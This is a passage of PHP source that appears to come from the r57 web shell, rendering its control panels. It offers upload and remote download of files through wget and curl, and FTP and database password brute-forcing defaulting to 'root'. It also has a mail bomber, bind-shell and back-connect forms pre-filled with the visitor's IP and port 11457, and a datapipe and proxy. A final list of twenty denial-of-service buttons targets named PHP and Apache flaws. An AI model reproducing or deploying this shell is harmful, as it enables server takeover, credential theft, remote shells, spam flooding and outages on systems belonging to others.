2085 echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
2086 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
2087 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2088 echo $te.'</div>'.$table_end1.$fe;
2089 } if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){ echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2090 echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
2091 echo "<tr><td valign=top width=50%>".$ts;
2092 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
2093 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
2094 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
2095 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
2096 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
2097 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
2098 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
2099 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
2100 echo $te."</td><td valign=top width=50%>".$ts;
2101 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
2102 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
2103 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
2104 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
2105 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
2106 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
2107 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
2108 echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2109 echo $te."</td></tr>";
2110 echo $te.'</div>'.$table_end1.$fe;
2111 } $select='';
2112 if((!@function_exists('ini_get')) ||(@ini_get('allow_url_fopen') &&@function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";
2113} if(!$safe_mode){ if(which('wget')){$select .= "<option value=\"wget\">wget</option>";
2114} if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";
2115} if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";
2116} if(which('links')){$select .= "<option value=\"links\">links</option>";
2117} if(which('curl')){$select .= "<option value=\"curl\">curl</option>";
2118} if(which('GET')){$select .= "<option value=\"GET\">GET</option>";
2119} } if($select){ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
2120 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select ."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2121 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2122 echo $te.'</div>'.$table_end1.$fe;
2123 } echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
2124 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2125 $arh = $lang[$language.'_text92'];
2126 if(@function_exists('gzcompress')) {$arh .= in('radio','compress',0,'zip').' zip';
2127} if(@function_exists('gzencode')) {$arh .= in('radio','compress',0,'gzip').' gzip';
2128} if(@function_exists('bzcompress')) {$arh .= in('radio','compress',0,'bzip').' bzip';
2129} echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2130 echo $te.'</div>'.$table_end1.$fe;
2131 if(@function_exists("ftp_connect")){ echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
2132 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
2133 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
2134 echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2135 echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
2136 echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
2137 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
2138 echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
2139 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
2140 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2141 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2142 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2143 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2144 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2145 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2146 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
2147 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2148 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2149 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2150 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2151 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2152 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2153 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2154 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
2155 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2156 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2157 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2158 echo $te."</td>".$fe."</tr></div></table>";
2159 } if(@function_exists("mail")){ echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
2160 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2161 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2162 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
2163 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
2164 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2165 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2166 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2167 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2168 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2169 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
2170 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
2171 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
2172 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2173 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2174 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2175 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
2176 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
2177 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2178 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2179 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
2180 echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
2181 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2182 echo $te."</td>".$fe."</tr></div></table>";
2183 } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = '<select name=db>';
2184 if($mysql_on) $select .= '<option>MySQL</option>';
2185 if($mssql_on) $select .= '<option>MSSQL</option>';
2186 if($pg_on) $select .= '<option>PostgreSQL</option>';
2187 if($ora_on) $select .= '<option>Oracle</option>';
2188 $select .= '</select>';
2189 echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
2190 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
2191 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
2192 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2193 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2194 echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2195 echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
2196 echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
2197 echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
2198 echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
2199 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
2200 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2201 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2202 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2203 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2204 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2205 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2206 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2207 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2208 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2209 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2210 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2211 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2212 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2213 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2214 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2215 echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;
2216\nSHOW TABLES;
2217\nSELECT * FROM user;
2218\nSELECT version();
2219\nSELECT user();
2220"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
2221 echo "</td>".$fe."</tr></div></table>";
2222 } if(!$safe_mode &&$unix){ echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
2223 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2224 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
2225 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
2226 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2227 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2228 echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
2229 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2230 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2231 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2232 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2233 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2234 echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
2235 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2236 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
2237 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
2238 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
2239 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2240 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2241 echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
2242 echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
2243 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
2244 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
2245 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2246 echo $te."</td>".$fe."</tr></div></table>";
2247 } echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
2248 echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
2249 echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
2250 echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
2251 echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
2252 echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
2253 echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
2254 echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
2255 echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
2256 echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
2257 echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
2258 echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
2259 echo $te."</td><td valign=top width=50%>".$ts;
2260 echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
2261 echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
2262 echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
2263 echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
2264 echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
2265 echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
2266 echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
2267 echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
2268 echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
2269 echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
2270 echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
2271 echo $te."</td></tr></div></table>";
2272 ?>